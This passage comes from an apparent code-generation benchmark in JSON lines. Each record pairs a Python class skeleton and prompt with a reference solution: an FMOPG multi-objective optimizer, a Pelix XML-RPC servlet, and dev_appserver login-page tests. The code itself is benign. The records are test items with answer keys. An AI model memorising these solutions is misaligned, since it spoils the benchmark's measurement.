solve the search direction problem :param gurobi_method: it indicates the method used by the Gurobi Optimizer :param gurobi_verbose: if set to True, it enables the verbosity for the Gurobi optimizer :param ALS_alpha_0: it indicates the initial step size for the Armijo-Type Line Search :param ALS_delta: it indicates the coefficient for the step size contraction :param ALS_beta: it i\n- def search(self, p_list: np.array, f_list: np.array, problem: Problem, index_initial_point: int=None, I: tuple=None): Execute the algorithm starting from a point of a given array :param p_list: problem solutions :param f_list: related points in the objectives space :param problem: the considered problem :param index_initial_point: the index of the problem solution to optimize :param I: the subset of objective functions indices to consider (see nsma.py) :return: the new arrays p_list and f_list; an array which contains for each processed point the optimal value of the search direction problem at that point (theta_array) Notes: The index of the point to optimize can change during the iterations. 
For the stopping conditions 'theta_tolerance', only the last value of theta, i.e., the one related to the last poin\n- def reset_stopping_conditions_current_values(self, theta_tol: float): Reset the stopping conditions current values :param theta_tol: the new current value for the stopping condition 'theta_tolerance' Notes: The current values of the stopping conditions 'max_time' and 'max_f_evals' are changed by the memetic algorithm that employs FMOPG.", "prompted_full_text": "Implement the Python class `FMOPG` described below.\n\nClass description:\nThe Front Multi-Objective Projected Gradient algorithm class The main functions are: - Initialize a FMOPG instance; - Execute the algorithm starting from a point of a given array; - Reset the stopping conditions current values.\n\nMethod signatures and docstrings:\n- def __init__(self, theta_tol: float, gurobi: bool, gurobi_method: int, gurobi_verbose: bool, ALS_alpha_0: float, ALS_delta: float, ALS_beta: float, ALS_min_alpha: float, max_iter: int=None, max_time: float=None, max_f_evals: int=None): Initialize a FMOPG instance :param theta_tol: it indicates the tolerance after which a point is considered Pareto-stationary; it can be seen as the epsilon value for the epsilon-Pareto-stationarity; for more details, the user is referred to the article :param gurobi: if set to True, the Gurobi Optimizer is used to solve the search direction problem :param gurobi_method: it indicates the method used by the Gurobi Optimizer :param gurobi_verbose: if set to True, it enables the verbosity for the Gurobi optimizer :param ALS_alpha_0: it indicates the initial step size for the Armijo-Type Line Search :param ALS_delta: it indicates the coefficient for the step size contraction :param ALS_beta: it i\n- def search(self, p_list: np.array, f_list: np.array, problem: Problem, index_initial_point: int=None, I: tuple=None): Execute the algorithm starting from a point of a given array :param p_list: problem solutions :param f_list: related points in the objectives space :param problem: the considered problem :param index_initial_point: the index of the problem solution to optimize :param I: the subset of objective functions indices to consider (see nsma.py) :return: the new arrays p_list and f_list; an array which contains for each processed point the optimal value of the search direction problem at that point (theta_array) Notes: The index of the point to optimize can change during the iterations. 
For the stopping conditions 'theta_tolerance', only the last value of theta, i.e., the one related to the last poin\n- def reset_stopping_conditions_current_values(self, theta_tol: float): Reset the stopping conditions current values :param theta_tol: the new current value for the stopping condition 'theta_tolerance' Notes: The current values of the stopping conditions 'max_time' and 'max_f_evals' are changed by the memetic algorithm that employs FMOPG.\n\n<|skeleton|>\nclass FMOPG:\n \"\"\"The Front Multi-Objective Projected Gradient algorithm class The main functions are: - Initialize a FMOPG instance; - Execute the algorithm starting from a point of a given array; - Reset the stopping conditions current values.\"\"\"\n\n def __init__(self, theta_tol: float, gurobi: bool, gurobi_method: int, gurobi_verbose: bool, ALS_alpha_0: float, ALS_delta: float, ALS_beta: float, ALS_min_alpha: float, max_iter: int=None, max_time: float=None, max_f_evals: int=None):\n \"\"\"Initialize a FMOPG instance :param theta_tol: it indicates the tolerance after which a point is considered Pareto-stationary; it can be seen as the epsilon value for the epsilon-Pareto-stationarity; for more details, the user is referred to the article :param gurobi: if set to True, the Gurobi Optimizer is used to solve the search direction problem :param gurobi_method: it indicates the method used by the Gurobi Optimizer :param gurobi_verbose: if set to True, it enables the verbosity for the Gurobi optimizer :param ALS_alpha_0: it indicates the initial step size for the Armijo-Type Line Search :param ALS_delta: it indicates the coefficient for the step size contraction :param ALS_beta: it i\"\"\"\n <|body_0|>\n\n def search(self, p_list: np.array, f_list: np.array, problem: Problem, index_initial_point: int=None, I: tuple=None):\n \"\"\"Execute the algorithm starting from a point of a given array :param p_list: problem solutions :param f_list: related points in the objectives space :param problem: the considered problem :param index_initial_point: the index of the problem solution to optimize :param I: the subset of objective functions indices to consider (see nsma.py) :return: the new arrays p_list and f_list; an array which contains for each processed point the optimal value of the search direction problem at that point (theta_array) Notes: The index of the point to optimize can change during the iterations. 
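One invariant in the search logic above is easy to lose in the flattened docstrings: theta, the optimal value of the search-direction subproblem, is non-positive, only its last recorded value feeds the 'theta_tolerance' stopping condition, and the loop keeps stepping only while theta stays below the (negative) tolerance. A toy, self-contained sketch of that bookkeeping pattern follows; it is not the library's API, and the reading that theta == 0 signals Pareto-stationarity is the standard one for projected-gradient multi-objective methods, assumed here rather than stated in the record.

import numpy as np

theta_tol = -1e-7  # assumed small negative tolerance
theta_array = np.array([-np.inf], dtype=float)

for n_iteration, theta in enumerate([-0.8, -0.2, -1e-9]):
    theta_array[n_iteration] = theta
    if theta >= theta_tol:
        # theta ~ 0: (epsilon-)Pareto-stationary, so the 'theta_tolerance'
        # stopping condition would fire here
        break
    # a step was accepted: grow the per-iteration array by one slot,
    # mirroring the np.concatenate calls in the recorded body
    theta_array = np.concatenate((theta_array, np.array([-np.inf])))

print(theta_array)  # the last recorded theta is the one that stopped the loop
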
For the stopping conditions 'theta_tolerance', only the last value of theta, i.e., the one related to the last poin\"\"\"\n <|body_1|>\n\n def reset_stopping_conditions_current_values(self, theta_tol: float):\n \"\"\"Reset the stopping conditions current values :param theta_tol: the new current value for the stopping condition 'theta_tolerance' Notes: The current values of the stopping conditions 'max_time' and 'max_f_evals' are changed by the memetic algorithm that employs FMOPG.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n GradientBasedAlgorithm.__init__(self, max_iter, max_time, max_f_evals, False, 0, False, False, 0, theta_tol, gurobi, gurobi_method, gurobi_verbose, ALS_alpha_0, ALS_delta, ALS_beta, ALS_min_alpha, name_DDS='Boundconstrained_Projected_Gradient_DDS', name_ALS='BoundconstrainedFrontALS')\n self.__theta_array = np.array([-np.inf], dtype=float)\n GradientBasedAlgorithm.add_stopping_condition(self, 'theta_tolerance', theta_tol, self.__theta_array[0], equal_required=True)\n self.__alpha_array = np.array([1], dtype=float)\n GradientBasedAlgorithm.add_stopping_condition(self, 'min_alpha', 0, self.__alpha_array[0], smaller_value_required=True, equal_required=True)\n<|end_body_0|>\n\n<|body_start_1|>\n n, m = (p_list.shape[1], f_list.shape[1])\n index_point = index_initial_point\n while not self.evaluate_stopping_conditions():\n n_iteration = self.get_stopping_condition_current_value('max_iter')\n J = problem.evaluate_functions_jacobian(p_list[index_point, :])\n self.add_to_stopping_condition_current_value('max_f_evals', n)\n if self.evaluate_stopping_conditions():\n break\n v, theta = self._direction_solver.compute_direction(problem, J[I,], x_p=p_list[index_point, :])\n self.__theta_array[n_iteration] = theta\n self.update_stopping_condition_current_value('theta_tolerance', self.__theta_array[n_iteration])\n if theta < self._theta_tol:\n new_p, new_f, alpha, f_eval_ls = self._line_search.search(problem, p_list[index_point, :], f_list, v, theta, np.array(list(I)))\n self.add_to_stopping_condition_current_value('max_f_evals', f_eval_ls)\n self.__alpha_array[n_iteration] = alpha\n self.update_stopping_condition_current_value('min_alpha', self.__alpha_array[n_iteration])\n if new_p is not None:\n p_list = np.concatenate((p_list, new_p.reshape((1, n))), axis=0)\n f_list = np.concatenate((f_list, new_f.reshape((1, m))), axis=0)\n index_point = p_list.shape[0] - 1\n self.__theta_array = np.concatenate((self.__theta_array, np.array([-np.inf])), axis=0)\n self.update_stopping_condition_current_value('theta_tolerance', self.__theta_array[n_iteration + 1])\n self.__alpha_array = np.concatenate((self.__alpha_array, np.array([1])), axis=0)\n self.update_stopping_condition_current_value('min_alpha', self.__alpha_array[n_iteration + 1])\n self.add_to_stopping_condition_current_value('max_iter', 1)\n return (p_list, f_list, self.__theta_array)\n<|end_body_1|>\n\n<|body_start_2|>\n self.update_stopping_condition_current_value('max_iter', 0)\n self._theta_tol = theta_tol\n self.__theta_array = np.array([-np.inf], dtype=float)\n self.update_stopping_condition_current_value('theta_tolerance', self.__theta_array[0])\n self.update_stopping_condition_reference_value('theta_tolerance', theta_tol)\n self.__alpha_array = np.array([1], dtype=float)\n self.update_stopping_condition_current_value('min_alpha', self.__alpha_array[0])\n<|end_body_2|>\n", "revision_id": "22610b3dbc308fe89309ac99204992feac048908", "skeleton": "<|skeleton|>\nclass FMOPG:\n \"\"\"The Front Multi-Objective Projected 
Gradient algorithm class The main functions are: - Initialize a FMOPG instance; - Execute the algorithm starting from a point of a given array; - Reset the stopping conditions current values.\"\"\"\n\n def __init__(self, theta_tol: float, gurobi: bool, gurobi_method: int, gurobi_verbose: bool, ALS_alpha_0: float, ALS_delta: float, ALS_beta: float, ALS_min_alpha: float, max_iter: int=None, max_time: float=None, max_f_evals: int=None):\n \"\"\"Initialize a FMOPG instance :param theta_tol: it indicates the tolerance after which a point is considered Pareto-stationary; it can be seen as the epsilon value for the epsilon-Pareto-stationarity; for more details, the user is referred to the article :param gurobi: if set to True, the Gurobi Optimizer is used to solve the search direction problem :param gurobi_method: it indicates the method used by the Gurobi Optimizer :param gurobi_verbose: if set to True, it enables the verbosity for the Gurobi optimizer :param ALS_alpha_0: it indicates the initial step size for the Armijo-Type Line Search :param ALS_delta: it indicates the coefficient for the step size contraction :param ALS_beta: it i\"\"\"\n <|body_0|>\n\n def search(self, p_list: np.array, f_list: np.array, problem: Problem, index_initial_point: int=None, I: tuple=None):\n \"\"\"Execute the algorithm starting from a point of a given array :param p_list: problem solutions :param f_list: related points in the objectives space :param problem: the considered problem :param index_initial_point: the index of the problem solution to optimize :param I: the subset of objective functions indices to consider (see nsma.py) :return: the new arrays p_list and f_list; an array which contains for each processed point the optimal value of the search direction problem at that point (theta_array) Notes: The index of the point to optimize can change during the iterations. 
For the stopping conditions 'theta_tolerance', only the last value of theta, i.e., the one related to the last poin\"\"\"\n <|body_1|>\n\n def reset_stopping_conditions_current_values(self, theta_tol: float):\n \"\"\"Reset the stopping conditions current values :param theta_tol: the new current value for the stopping condition 'theta_tolerance' Notes: The current values of the stopping conditions 'max_time' and 'max_f_evals' are changed by the memetic algorithm that employs FMOPG.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class FMOPG:\n \"\"\"The Front Multi-Objective Projected Gradient algorithm class The main functions are: - Initialize a FMOPG instance; - Execute the algorithm starting from a point of a given array; - Reset the stopping conditions current values.\"\"\"\n\n def __init__(self, theta_tol: float, gurobi: bool, gurobi_method: int, gurobi_verbose: bool, ALS_alpha_0: float, ALS_delta: float, ALS_beta: float, ALS_min_alpha: float, max_iter: int=None, max_time: float=None, max_f_evals: int=None):\n \"\"\"Initialize a FMOPG instance :param theta_tol: it indicates the tolerance after which a point is considered Pareto-stationary; it can be seen as the epsilon value for the epsilon-Pareto-stationarity; for more details, the user is referred to the article :param gurobi: if set to True, the Gurobi Optimizer is used to solve the search direction problem :param gurobi_method: it indicates the method used by the Gurobi Optimizer :param gurobi_verbose: if set to True, it enables the verbosity for the Gurobi optimizer :param ALS_alpha_0: it indicates the initial step size for the Armijo-Type Line Search :param ALS_delta: it indicates the coefficient for the step size contraction :param ALS_beta: it i\"\"\"\n GradientBasedAlgorithm.__init__(self, max_iter, max_time, max_f_evals, False, 0, False, False, 0, theta_tol, gurobi, gurobi_method, gurobi_verbose, ALS_alpha_0, ALS_delta, ALS_beta, ALS_min_alpha, name_DDS='Boundconstrained_Projected_Gradient_DDS', name_ALS='BoundconstrainedFrontALS')\n self.__theta_array = np.array([-np.inf], dtype=float)\n GradientBasedAlgorithm.add_stopping_condition(self, 'theta_tolerance', theta_tol, self.__theta_array[0], equal_required=True)\n self.__alpha_array = np.array([1], dtype=float)\n GradientBasedAlgorithm.add_stopping_condition(self, 'min_alpha', 0, self.__alpha_array[0], smaller_value_required=True, equal_required=True)\n\n def search(self, p_list: np.array, f_list: np.array, problem: Problem, index_initial_point: int=None, I: tuple=None):\n \"\"\"Execute the algorithm starting from a point of a given array :param p_list: problem solutions :param f_list: related points in the objectives space :param problem: the considered problem :param index_initial_point: the index of the problem solution to optimize :param I: the subset of objective functions indices to consider (see nsma.py) :return: the new arrays p_list and f_list; an array which contains for each processed point the optimal value of the search direction problem at that point (theta_array) Notes: The index of the point to optimize can change during the iterations. 
For the stopping conditions 'theta_tolerance', only the last value of theta, i.e., the one related to the last poin\"\"\"\n n, m = (p_list.shape[1], f_list.shape[1])\n index_point = index_initial_point\n while not self.evaluate_stopping_conditions():\n n_iteration = self.get_stopping_condition_current_value('max_iter')\n J = problem.evaluate_functions_jacobian(p_list[index_point, :])\n self.add_to_stopping_condition_current_value('max_f_evals', n)\n if self.evaluate_stopping_conditions():\n break\n v, theta = self._direction_solver.compute_direction(problem, J[I,], x_p=p_list[index_point, :])\n self.__theta_array[n_iteration] = theta\n self.update_stopping_condition_current_value('theta_tolerance', self.__theta_array[n_iteration])\n if theta < self._theta_tol:\n new_p, new_f, alpha, f_eval_ls = self._line_search.search(problem, p_list[index_point, :], f_list, v, theta, np.array(list(I)))\n self.add_to_stopping_condition_current_value('max_f_evals', f_eval_ls)\n self.__alpha_array[n_iteration] = alpha\n self.update_stopping_condition_current_value('min_alpha', self.__alpha_array[n_iteration])\n if new_p is not None:\n p_list = np.concatenate((p_list, new_p.reshape((1, n))), axis=0)\n f_list = np.concatenate((f_list, new_f.reshape((1, m))), axis=0)\n index_point = p_list.shape[0] - 1\n self.__theta_array = np.concatenate((self.__theta_array, np.array([-np.inf])), axis=0)\n self.update_stopping_condition_current_value('theta_tolerance', self.__theta_array[n_iteration + 1])\n self.__alpha_array = np.concatenate((self.__alpha_array, np.array([1])), axis=0)\n self.update_stopping_condition_current_value('min_alpha', self.__alpha_array[n_iteration + 1])\n self.add_to_stopping_condition_current_value('max_iter', 1)\n return (p_list, f_list, self.__theta_array)\n\n def reset_stopping_conditions_current_values(self, theta_tol: float):\n \"\"\"Reset the stopping conditions current values :param theta_tol: the new current value for the stopping condition 'theta_tolerance' Notes: The current values of the stopping conditions 'max_time' and 'max_f_evals' are changed by the memetic algorithm that employs FMOPG.\"\"\"\n self.update_stopping_condition_current_value('max_iter', 0)\n self._theta_tol = theta_tol\n self.__theta_array = np.array([-np.inf], dtype=float)\n self.update_stopping_condition_current_value('theta_tolerance', self.__theta_array[0])\n self.update_stopping_condition_reference_value('theta_tolerance', theta_tol)\n self.__alpha_array = np.array([1], dtype=float)\n self.update_stopping_condition_current_value('min_alpha', self.__alpha_array[0])\n", "source": "the_stack_v2_python_sparse", "source_path": "algorithms/gradient_based/local_search_algorithms/fmopg.py", "source_repo": "pierlumanzu/nsma", "split": "test", "star_events_count": 5} {"blob_id": "389b925eaf10f64c913a9b22c06b1bac77b01162", "bodies": ["SimpleXMLRPCDispatcher.__init__(self, allow_none=True, encoding=encoding)\nself.register_introspection_functions()\nself._dispatch_method = dispatch_method", "try:\n return self.funcs[name](*params)\nexcept KeyError:\n pass\nreturn self._dispatch_method(name, params)", "data = to_str(request.read_data())\nresult = self._marshaled_dispatch(data, self._simple_dispatch)\nresponse.send_content(200, result, 'text/xml')"], "bodies_text": "<|body_start_0|>\n SimpleXMLRPCDispatcher.__init__(self, allow_none=True, encoding=encoding)\n self.register_introspection_functions()\n self._dispatch_method = dispatch_method\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n return self.funcs[name](*params)\n except 
KeyError:\n pass\n return self._dispatch_method(name, params)\n<|end_body_1|>\n\n<|body_start_2|>\n data = to_str(request.read_data())\n result = self._marshaled_dispatch(data, self._simple_dispatch)\n response.send_content(200, result, 'text/xml')\n<|end_body_2|>\n", "class_docstring": "A XML-RPC servlet that can be registered in the Pelix HTTP service Calls the dispatch method given in the constructor", "class_name": "_XmlRpcServlet", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass _XmlRpcServlet:\n \"\"\"A XML-RPC servlet that can be registered in the Pelix HTTP service Calls the dispatch method given in the constructor\"\"\"\n\n def __init__(self, dispatch_method, encoding=None):\n \"\"\"Sets up the servlet\"\"\"\n <|body_0|>\n\n def _simple_dispatch(self, name, params):\n \"\"\"Dispatch method\"\"\"\n <|body_1|>\n\n def do_POST(self, request, response):\n \"\"\"Handles a HTTP POST request :param request: The HTTP request bean :param response: The HTTP response handler\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n SimpleXMLRPCDispatcher.__init__(self, allow_none=True, encoding=encoding)\n self.register_introspection_functions()\n self._dispatch_method = dispatch_method\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n return self.funcs[name](*params)\n except KeyError:\n pass\n return self._dispatch_method(name, params)\n<|end_body_1|>\n\n<|body_start_2|>\n data = to_str(request.read_data())\n result = self._marshaled_dispatch(data, self._simple_dispatch)\n response.send_content(200, result, 'text/xml')\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000193", "length_bytes": 8341, "license_type": "permissive", "methods": [{"docstring": "Sets up the servlet", "name": "__init__", "signature": "def __init__(self, dispatch_method, encoding=None)"}, {"docstring": "Dispatch method", "name": "_simple_dispatch", "signature": "def _simple_dispatch(self, name, params)"}, {"docstring": "Handles a HTTP POST request :param request: The HTTP request bean :param response: The HTTP response handler", "name": "do_POST", "signature": "def do_POST(self, request, response)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_000599", "prompt": "Implement the Python class `_XmlRpcServlet` described below.\n\nClass description:\nA XML-RPC servlet that can be registered in the Pelix HTTP service Calls the dispatch method given in the constructor\n\nMethod signatures and docstrings:\n- def __init__(self, dispatch_method, encoding=None): Sets up the servlet\n- def _simple_dispatch(self, name, params): Dispatch method\n- def do_POST(self, request, response): Handles a HTTP POST request :param request: The HTTP request bean :param response: The HTTP response handler", "prompted_full_text": "Implement the Python class `_XmlRpcServlet` described below.\n\nClass description:\nA XML-RPC servlet that can be registered in the Pelix HTTP service Calls the dispatch method given in the constructor\n\nMethod signatures and docstrings:\n- def __init__(self, dispatch_method, encoding=None): Sets up the servlet\n- def _simple_dispatch(self, name, params): Dispatch method\n- def do_POST(self, request, response): Handles a HTTP POST request :param request: The HTTP request bean :param response: The HTTP response handler\n\n<|skeleton|>\nclass _XmlRpcServlet:\n \"\"\"A XML-RPC servlet that can be registered in the Pelix HTTP service Calls the dispatch method given in the constructor\"\"\"\n\n def __init__(self, 
dispatch_method, encoding=None):\n \"\"\"Sets up the servlet\"\"\"\n <|body_0|>\n\n def _simple_dispatch(self, name, params):\n \"\"\"Dispatch method\"\"\"\n <|body_1|>\n\n def do_POST(self, request, response):\n \"\"\"Handles a HTTP POST request :param request: The HTTP request bean :param response: The HTTP response handler\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n SimpleXMLRPCDispatcher.__init__(self, allow_none=True, encoding=encoding)\n self.register_introspection_functions()\n self._dispatch_method = dispatch_method\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n return self.funcs[name](*params)\n except KeyError:\n pass\n return self._dispatch_method(name, params)\n<|end_body_1|>\n\n<|body_start_2|>\n data = to_str(request.read_data())\n result = self._marshaled_dispatch(data, self._simple_dispatch)\n response.send_content(200, result, 'text/xml')\n<|end_body_2|>\n", "revision_id": "1d0add361ca219da8fdf72bb9ba8cb0ade01ad2f", "skeleton": "<|skeleton|>\nclass _XmlRpcServlet:\n \"\"\"A XML-RPC servlet that can be registered in the Pelix HTTP service Calls the dispatch method given in the constructor\"\"\"\n\n def __init__(self, dispatch_method, encoding=None):\n \"\"\"Sets up the servlet\"\"\"\n <|body_0|>\n\n def _simple_dispatch(self, name, params):\n \"\"\"Dispatch method\"\"\"\n <|body_1|>\n\n def do_POST(self, request, response):\n \"\"\"Handles a HTTP POST request :param request: The HTTP request bean :param response: The HTTP response handler\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class _XmlRpcServlet:\n \"\"\"A XML-RPC servlet that can be registered in the Pelix HTTP service Calls the dispatch method given in the constructor\"\"\"\n\n def __init__(self, dispatch_method, encoding=None):\n \"\"\"Sets up the servlet\"\"\"\n SimpleXMLRPCDispatcher.__init__(self, allow_none=True, encoding=encoding)\n self.register_introspection_functions()\n self._dispatch_method = dispatch_method\n\n def _simple_dispatch(self, name, params):\n \"\"\"Dispatch method\"\"\"\n try:\n return self.funcs[name](*params)\n except KeyError:\n pass\n return self._dispatch_method(name, params)\n\n def do_POST(self, request, response):\n \"\"\"Handles a HTTP POST request :param request: The HTTP request bean :param response: The HTTP response handler\"\"\"\n data = to_str(request.read_data())\n result = self._marshaled_dispatch(data, self._simple_dispatch)\n response.send_content(200, result, 'text/xml')\n", "source": "the_stack_v2_python_sparse", "source_path": "pelix/remote/xml_rpc.py", "source_repo": "tcalmant/ipopo", "split": "test", "star_events_count": 67} {"blob_id": "1ffa5814cc5ee2da8d735c79e1674aef1aecfad4", "bodies": ["host = 'foo.com:1234'\npath_info = '/_ah/login'\ncookie_dict = {}\naction = ''\nset_email = ''\nset_admin = False\ncontinue_url = ''\nstatus, location, set_cookie, content_type = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\nself.assertEqual(302, status)\nself.assertFalse(set_cookie)\nself.assertEqual('text/html; charset=utf-8', content_type)", "host = 'foo.com:1234'\npath_info = '/_ah/login'\ncookie_dict = {}\naction = 'Login'\nset_email = EMAIL\nset_admin = False\ncontinue_url = ''\nexpected_set = login._set_user_info_cookie(set_email, set_admin).strip()\nstatus, location, set_cookie, _ = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\nself.assertEqual(302, 
status)\nself.assertEqual('http://%s%s' % (host, path_info), location)\nself.assertEqual(expected_set, set_cookie)\nself.assertIsInstance(location, str)\nself.assertIsInstance(set_cookie, str)\ncontinue_url = 'http://foo.com/blah'\nstatus, location, set_cookie, _ = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\nself.assertEqual(302, status)\nself.assertEqual(continue_url, location)\nself.assertEqual(expected_set, set_cookie)\nself.assertIsInstance(location, str)\nself.assertIsInstance(set_cookie, str)", "host = 'foo.com:1234'\npath_info = '/_ah/login'\ncookie_dict = {'dev_appserver_login': '%s:False:%s' % (EMAIL, USER_ID)}\naction = 'Logout'\nset_email = ''\nset_admin = False\ncontinue_url = ''\nexpected_set = login._clear_user_info_cookie().strip()\nstatus, location, set_cookie, _ = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\nself.assertEqual(302, status)\nself.assertEqual('http://%s%s' % (host, path_info), location)\nself.assertEqual(expected_set, set_cookie)\nself.assertIsInstance(location, str)\nself.assertIsInstance(set_cookie, str)\ncontinue_url = 'http://foo.com/blah'\nstatus, location, set_cookie, _ = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\nself.assertEqual(302, status)\nself.assertEqual(continue_url, location)\nself.assertEqual(expected_set, set_cookie)\nself.assertIsInstance(location, str)\nself.assertIsInstance(set_cookie, str)", "host = 'foo.com:1234'\npath_info = '/_ah/login'\ncookie_dict = {'dev_appserver_login': '%s:False:%s' % (EMAIL, USER_ID)}\naction = ''\nset_email = ''\nset_admin = False\ncontinue_url = '/my/fancy/url'\ncontinue_url = 'http://foo.com/blah'\nstatus, location, set_cookie, content_type = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\nself.assertEqual(302, status)\nself.assertFalse(set_cookie)\nself.assertEqual('text/html; charset=utf-8', content_type)\nself.assertIsInstance(content_type, str)", "environ = {}\nwsgiref.util.setup_testing_defaults(environ)\nenviron['SERVER_NAME'] = 'do_not_use'\nenviron['SERVER_PORT'] = '666'\nenviron['SERVER_PROTOCOL'] = 'HTTP/1.1'\nenviron['HTTP_HOST'] = host\nenviron['PATH_INFO'] = path_info\nenviron['REQUEST_METHOD'] = method\nif cookie_dict:\n cookie = Cookie.SimpleCookie(cookie_dict)\n cookie_value = ';'.join((m.OutputString() for m in cookie.values()))\n environ['HTTP_COOKIE'] = cookie_value\nquery_dict = {}\nif action:\n query_dict['action'] = action\nif set_email:\n query_dict['email'] = set_email\nif set_admin:\n query_dict['admin'] = set_admin\nif continue_url:\n query_dict['continue'] = continue_url\nif query_dict:\n environ['QUERY_STRING'] = urllib.urlencode(query_dict)\nresponse_dict = {}\n\ndef start_response(status, headers):\n response_dict['status'] = int(status.split(' ', 1)[0])\n response_dict['headers'] = dict(((k.lower(), v) for k, v in headers))\nlogin.application(environ, start_response)\nreturn (response_dict['status'], response_dict['headers'].get('location'), response_dict['headers'].get('set-cookie'), response_dict['headers'].get('content-type'))"], "bodies_text": "<|body_start_0|>\n host = 'foo.com:1234'\n path_info = '/_ah/login'\n cookie_dict = {}\n action = ''\n set_email = ''\n set_admin = False\n continue_url = ''\n status, location, set_cookie, content_type = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertFalse(set_cookie)\n 
self.assertEqual('text/html; charset=utf-8', content_type)\n<|end_body_0|>\n\n<|body_start_1|>\n host = 'foo.com:1234'\n path_info = '/_ah/login'\n cookie_dict = {}\n action = 'Login'\n set_email = EMAIL\n set_admin = False\n continue_url = ''\n expected_set = login._set_user_info_cookie(set_email, set_admin).strip()\n status, location, set_cookie, _ = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertEqual('http://%s%s' % (host, path_info), location)\n self.assertEqual(expected_set, set_cookie)\n self.assertIsInstance(location, str)\n self.assertIsInstance(set_cookie, str)\n continue_url = 'http://foo.com/blah'\n status, location, set_cookie, _ = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertEqual(continue_url, location)\n self.assertEqual(expected_set, set_cookie)\n self.assertIsInstance(location, str)\n self.assertIsInstance(set_cookie, str)\n<|end_body_1|>\n\n<|body_start_2|>\n host = 'foo.com:1234'\n path_info = '/_ah/login'\n cookie_dict = {'dev_appserver_login': '%s:False:%s' % (EMAIL, USER_ID)}\n action = 'Logout'\n set_email = ''\n set_admin = False\n continue_url = ''\n expected_set = login._clear_user_info_cookie().strip()\n status, location, set_cookie, _ = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertEqual('http://%s%s' % (host, path_info), location)\n self.assertEqual(expected_set, set_cookie)\n self.assertIsInstance(location, str)\n self.assertIsInstance(set_cookie, str)\n continue_url = 'http://foo.com/blah'\n status, location, set_cookie, _ = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertEqual(continue_url, location)\n self.assertEqual(expected_set, set_cookie)\n self.assertIsInstance(location, str)\n self.assertIsInstance(set_cookie, str)\n<|end_body_2|>\n\n<|body_start_3|>\n host = 'foo.com:1234'\n path_info = '/_ah/login'\n cookie_dict = {'dev_appserver_login': '%s:False:%s' % (EMAIL, USER_ID)}\n action = ''\n set_email = ''\n set_admin = False\n continue_url = '/my/fancy/url'\n continue_url = 'http://foo.com/blah'\n status, location, set_cookie, content_type = self._run_test(host, path_info, cookie_dict, action, set_email, set_admin, continue_url)\n self.assertEqual(302, status)\n self.assertFalse(set_cookie)\n self.assertEqual('text/html; charset=utf-8', content_type)\n self.assertIsInstance(content_type, str)\n<|end_body_3|>\n\n<|body_start_4|>\n environ = {}\n wsgiref.util.setup_testing_defaults(environ)\n environ['SERVER_NAME'] = 'do_not_use'\n environ['SERVER_PORT'] = '666'\n environ['SERVER_PROTOCOL'] = 'HTTP/1.1'\n environ['HTTP_HOST'] = host\n environ['PATH_INFO'] = path_info\n environ['REQUEST_METHOD'] = method\n if cookie_dict:\n cookie = Cookie.SimpleCookie(cookie_dict)\n cookie_value = ';'.join((m.OutputString() for m in cookie.values()))\n environ['HTTP_COOKIE'] = cookie_value\n query_dict = {}\n if action:\n query_dict['action'] = action\n if set_email:\n query_dict['email'] = set_email\n if set_admin:\n query_dict['admin'] = set_admin\n if continue_url:\n query_dict['continue'] = continue_url\n if query_dict:\n environ['QUERY_STRING'] = urllib.urlencode(query_dict)\n response_dict = {}\n\n def start_response(status, headers):\n response_dict['status'] = int(status.split(' ', 1)[0])\n response_dict['headers'] = 
dict(((k.lower(), v) for k, v in headers))\n login.application(environ, start_response)\n return (response_dict['status'], response_dict['headers'].get('location'), response_dict['headers'].get('set-cookie'), response_dict['headers'].get('content-type'))\n<|end_body_4|>\n", "class_docstring": "Tests the various ways of invoking the login page.", "class_name": "LoginPageTest", "detected_licenses": ["Apache-2.0", "LGPL-2.1-or-later", "BSD-3-Clause", "MIT", "GPL-2.0-or-later", "MPL-1.1"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass LoginPageTest:\n \"\"\"Tests the various ways of invoking the login page.\"\"\"\n\n def test_no_params(self):\n \"\"\"Tests just accessing the login URL with no params.\"\"\"\n <|body_0|>\n\n def test_login(self):\n \"\"\"Tests when setting the user info with and without continue URL.\"\"\"\n <|body_1|>\n\n def test_logout(self):\n \"\"\"Tests when logging out with and without continue URL.\"\"\"\n <|body_2|>\n\n def test_passive(self):\n \"\"\"Tests when the user is already logged in.\"\"\"\n <|body_3|>\n\n def _run_test(self, host, path_info='/', cookie_dict=None, action=None, set_email=None, set_admin=None, continue_url=None, method='GET'):\n \"\"\"Runs the login HTTP handler, returning information about the response. Args: host: The value of the HTTP Host header. path_info: The absolute path of the request. cookie_dict: A cookie dictionary with the existing cookies. action: Value of the 'action' query argument. set_email: Value of the 'email' query argument. set_admin: Value of the 